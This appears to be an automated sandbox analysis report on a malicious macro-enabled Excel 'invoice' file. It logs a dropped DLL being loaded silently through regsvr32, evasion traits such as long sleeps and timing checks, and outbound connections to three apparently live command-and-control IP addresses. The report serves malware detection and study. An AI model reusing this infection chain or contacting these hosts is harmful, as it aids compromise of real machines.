Source: INV2680371456-20210111889374.xlsm	OLE, VBA macro line: Private Sub view_1_a_Layout(ByVal Index As Long)
Source: VBA code instrumentation	OLE, VBA macro: Module Sheet1, Function view_1_a_Layout			Name: view_1_a_Layout

Source: INV2680371456-20210111889374.xlsm

OLE indicator, VBA macros: true

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1840

Source: d0l359[1].rar.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: d0l359[1].rar.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: d0l359[1].rar.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: d0l359[1].rar.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.expl.evad.winXLSM@9/21@1/5

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$INV2680371456-20210111889374.xlsm

Jump to behavior

Source: C:\Windows\System32\DWWIN.EXE

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2292

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD0F5.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: INV2680371456-20210111889374.xlsm	Virustotal: Detection: 46%
Source: INV2680371456-20210111889374.xlsm	ReversingLabs: Detection: 32%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1840
Source: unknown	Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1840
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1840	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE	Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1840	Jump to behavior

Source: C:\Windows\System32\DWWIN.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{713AACC8-3B71-435C-A3A1-BE4E53621AB1}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Automated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: INV2680371456-20210111889374.xlsm	Initial sample: OLE zip file path = xl/media/image2.png
Source: INV2680371456-20210111889374.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: INV2680371456-20210111889374.xlsm

Initial sample: OLE indicators vbamacros = False

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,

4_2_10002140

Source: d0l359[1].rar.0.dr	Static PE information: section name: .rdata3
Source: d0l359[1].rar.0.dr	Static PE information: section name: .2
Source: d0l359[1].rar.0.dr	Static PE information: section name: .rdata2
Source: d0l359[1].rar.0.dr	Static PE information: section name: .text4

Source: unknown

Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000400A push esi; retf	4_2_1000401D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10010810 pushfd ; retf	4_2_1001084E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000D856 push ebp; retf	4_2_1000D85E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000C265 push 588A19FDh; iretd	4_2_1000C278
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10020A73 push edx; iretd	4_2_10020A9C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000FEBF push eax; iretd	4_2_1000FEC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000E8F3 pushad ; iretd	4_2_1000E8F4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000FEFA push 00000000h; iretd	4_2_1000FF10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10023EFF push eax; iretd	4_2_10023F64
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000C304 push 588A1BCDh; iretd	4_2_1000C314
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10010307 push esp; retf	4_2_10010308
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000CF15 push 0000002Dh; iretd	4_2_1000CF1C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001DB23 push eax; iretd	4_2_1001DB34
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10020B27 push eax; iretd	4_2_10020B28
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10002140 push ecx; ret	4_2_100021B6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001CD9B push esp; retf	4_2_1001CDB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000DFC7 pushad ; iretd	4_2_1000DFC8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10023FEB push edx; ret	4_2_10024001
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100107FB pushfd ; retf	4_2_1001084E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0017BFB0 push edx; ret	4_2_0017C269
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00147172 push dword ptr [ebp+ecx*8-49h]; retf	4_2_00147176
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_001662CD pushad ; iretd	4_2_001662E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0015F6CD push esi; ret	4_2_0015F6D7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0014899D push 00000369h; ret	4_2_00148A28
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_001489CD push 00000369h; ret	4_2_00148A28
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0016FB74 push esi; ret	4_2_0016FB8B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00141D11 push FFFFFFD5h; ret	4_2_00141D18
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00140E8F push esi; ret	4_2_00140E94

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rar			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\aymakjne.dll			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rar

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_001588DD rdtsc

4_2_001588DD

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rar

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2780	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -572000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -396000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -456000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -540000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -644000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -167000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -326000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -156000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -272000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -178000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -548000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -414000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -645000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -289000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -471000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -531000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -1460000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -246000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -176000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -620000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -532000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -298000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -344000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -465000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -128000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -293000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -700000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -678000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -242000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -918000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -489000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -292000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -417000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -426000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -696000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -348000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -173000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -594000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -580000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -268000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -494000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -316000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -358000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -566000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -588000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -889000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -918000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -650000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -316000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -252000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -253000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -492000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -282000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -276000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -1050000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -160000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -258000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -298000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -308000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -686000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -257000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -296000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -618000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -255000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -340000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -658000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -666000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -830000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -244000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -242000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -311000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -270000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -477000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -291000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -162000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -338000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -319000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -327000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -341000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -265000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -288000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -353000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -273000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -171000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -337000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -269000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -272000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -267000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -328000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -154000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -277000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -280000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -294000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -350000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -165000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520	Thread sleep time: -310000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE TID: 2428	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_001588DD rdtsc

4_2_001588DD

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,

4_2_10002140

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0017B5D0 mov eax, dword ptr fs:[00000030h]		4_2_0017B5D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0017B6E0 mov eax, dword ptr fs:[00000030h]		4_2_0017B6E0

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 80.86.91.27 236	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 5.100.228.233 61	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 46.105.131.65 232	Jump to behavior
